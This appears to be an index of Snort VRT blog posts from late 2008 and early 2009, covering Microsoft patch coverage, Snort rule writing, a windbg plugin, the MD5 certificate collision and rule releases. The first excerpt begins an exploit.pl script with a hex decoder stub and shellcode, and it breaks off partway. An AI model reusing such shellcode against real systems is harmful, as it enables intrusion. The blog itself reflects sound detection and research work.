Preventing Shong from getting her CISSP
================== exploit.pl ================== $decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" . "\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff"; $shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x
Microsoft Tuesday Coverage for January MS09-001
Just one Microsoft advisory to start the new year; we worked like crazy spider monkeys to get it covered, and we did it. Details are available here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-13.html
Using Snort Subscriber Rule Set Certified Shared Object Rules
In order to instantiate shared object rules, a rule stub file is required. These stub files are not distributed in the VRT Certified rule packs; however, they can be generated using Snort. Here is an example showing the pertinent configuration options in snort.conf along with the
Tips for Writing Good Rules from a n00b
It has been two months since I joined the VRT. Since then, I have learned a lot about Snort and want to share some tactics with other people who are new to Snort (as I was). More precisely, I want to talk about how to write good Snort rules with performance in mind. First of all
New byakugan functionality!
I've just added a new jutsu method to byakugan to help you find the address of a particular primitive (DWORD, WORD, or BYTE) in memory. Obviously, this isn't a terribly difficult task - you use the search function in windbg. What trackVal will do for you is allow you to s
MD5 actually harmful
You probably shouldn't take any other view of this vulnerability into consideration. Some amazing research and dedication went into proving this vulnerability is realistic and viable. You should note that detection of it is not really feasible; the bad certs look exactly like
The vuln before Christmas
* 'Twas the night before Christmas, and all through the net, * not a hacker was stirring, not even FX, * the servers all hummed in post-purchase daze, * to await the deluge of gift-card traffic craze, * * The VRT was drinking, three sheets to the wi
MS-SQL Quickie update
Hey folks, since MS chose today to speak on this issue (see http://www.microsoft.com/technet/security/advisory/961040.mspx), we wanted to remind you that we released coverage for this rule on the 9th of December. The following SIDs address this issue: 15127, 15128, 15129, 15130
Rule release for today - December 23 2008
Mostly a maintenance release this one, with some new rules in web-activex, web-client, backdoor and specific-threats. Check out the information here: http://www.snort.org/vrt/advisories/vrt-rules-2008-12-23.html